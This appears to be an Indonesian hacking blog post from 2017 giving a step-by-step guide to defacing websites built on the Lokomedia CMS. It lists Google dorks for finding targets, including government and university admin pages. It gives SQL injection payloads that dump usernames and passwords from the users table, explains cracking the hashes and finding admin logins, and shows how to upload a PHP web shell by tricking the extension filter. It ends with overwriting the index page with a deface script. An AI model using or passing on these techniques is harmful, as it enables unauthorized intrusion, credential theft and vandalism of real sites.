Oke kali ini ane mau share Defece Metode Sql Lokomedia, sebelum kita mulai saya mau berterima kasih ke pada Sepprudien A.K.A Mr.Trouble5hooting :D ,mastah lokomedia hhehehehehe ,,oke Kecoa kita ke TKP.
Bahan :
A. Dork
B. Rokok + Kopi
C . Internet yg penting :v
1. Dork .
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
intext:lokomedia inurl:statis- ext:html
intext:lokomedia inurl:kategori- 6 - .html
intext:lokomedia inurl:semua- ext:html
inurl:kategori-32-daerah.html site:.com
intext:copyright by inurl:statis-1 ext:html
intext:lokomedia inurl:statis- ext:html
intext:lokomedia inurl:semua- ext:html
intext:lokomedia inurl:hubungi- ext:html
intext:lokomedia inurl:kategori- ext:html
intext:lokomedia inurl:berita- ext:html
inurl:foto_info
inurl:foto_produk intext:shop
inurl:foto_banner intext:shop
inurl:foto_berita intext:shop
inurl:foto_user intext:shop
inurl:/adminweb/login "Halaman Login"
inurl:content.php?module=banner
inurl:content.php?module=user
inurl:content.php?module=berita
inurl:content.php?module=iklan
inurl:content.php?module=produk
intext:copyright @ "Developed by" inurl:/berita- - ext:html site:.
intext:Kembali ke Website Utama
intext:Developed by inurl:berita- ext:html
"Developed by" inurl:/statis-1- ext:html site:.
inurl:/statis-10 ext:html
inurl:/statis-16 ext:html
intext:copyright @ "Developed by" inurl:/berita- - ext:html site:.
intext:Kembali ke Website Utama
intext:Developed by inurl:berita- ext:html
intext:copyright by inurl:statis-1 ext:html
inurl:/semua-berita.html site:coli :V "Total Pengunjung Hari Ini"
intext:copyright @ "Developed by" inurl:/berita- - ext:html site:.
intext:Kembali ke Website Utama
intext:Developed by inurl:berita- ext:html
"Developed by" inurl:/statis-1- ext:html site:.
"Developed by" inurl:/statis-1- ext:html site:.com/net/id/coli :V
Copyright © 2013 by Polostama. All rights reserved.
inurl:media.php?module=home
#Selebihnya kembangin Peke Imajinasi Cabul mu ,,, :D
2. Exploit SQLi (SQL Injection) :
www.target.co.li/Kategori- :'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--
www.target.co.li/statis- :'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+
Tutornya :
1. Cari target dahulu , sebagai contoh nya ,saya menggunakan DORK
statis-1-profil.html lalu search di GOOGLE nanti akan banyak
SITE nya . :D
2. Buka Website tersebut , Contoh http://netnot. com/statis-1-pengantar.html
lalu masukan Exploit nya di http://site.com/statis--1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
Kalau ane dapatnya yang http://target.com/berita-blabl-ablabla-blabla{-}nla.html
exploitnya di dalam kurung yah,, kaya gambar ini,, :D
tuh,, Muncul deh Kode Buat Colinnya :V
3. Tinggal di decrypt deh di disini :V 
4 . jika password tersebut di temukan carilah admin login nya dengan Imajinasi,,, biasannya
di
/admin/
/adminweb/
/administrator/
/redaktur/
DORK PAGE LOGIN :
intext:Developed by inurl:berita- ext:html
intitle:.:: Administrator - Website ::. intext:LOGIN ADMINISTRATOR "BATALKAN"
intittle:adminstration login lokomedia site:go.id
intitle:.:: Administrator - Website ::. intext:LOGIN ADMINISTRATOR site:.ac.id
intittle:adminstration login lokomedia site:go.id
intitle:.:: Administrator - Website ::. intext:LOGIN ADMINISTRATOR site:.ac.id
intittle:Administrator CMS Lokomedia
intittle:..::: Login Anggota :::..
intitle:.:: HALAMAN ADMINISTRATOR ::.
intittle:..::: Login Elearning :::..
intittle:..::: Login Administrator :::.. site:go.id
intittle:.:: Login Adminstration ::. site:go.id
intittle:..::: Login Sistem ::.. site:go.id
intittle:.:: ADMINISTRATOR LOGIN ::. site:go.id
intittle:adminstration > login site:go.id
intittle:adminstration > Website site:go.id
intitle:Panel Administrator
inur:.com/adminweb "Username"
inur:.org/adminweb "Username"
inur:.net/adminweb "Username"
inur:.go.id/adminweb "Username"
inur:.desa.id/adminweb "Username"
inur:.co.id/adminweb "Username"
inur:.web.id/adminweb "Username"
6.Anggap saja page loginnya dah ketemu,,, :V
7. Truzzzzz,,, login Hasil Coli lo,, dengan Pw tadi,,,
8.Untuk Uploud Shellnya Di Download,, biasakan yang .phtml atau Menggunakan Tamper Data jadi Ruba File Shellnya jadi Shell.php.jpg Terus KLIK Tamper Hapus yang .jpg di Sebelah Kanan Kolom nya Dan Klik Oke-Oke terus,,
Hingga Uploud Sukses :V,, 
10. Anggap aja dah Tertanam,,, :V ,, Panggil Shellnya contoh http://target.com/files/shellkamu.phtml ia kamuu.. :V
11Setelah itu cari Halaman yang /public_html/ Cari File nya yang Index.php atau Media.php
#UTAMAKAN BACK_UP tinggal Rename aja File Aslinnya,, Ganti Dengan Script Deface Lo,,
12. Dan Lihat ,, :V
Tapi Ingat "Imajinasi Itu Tak Terbatas"
thank's to Sepprudien :D
Selasa, 07 Maret 2017
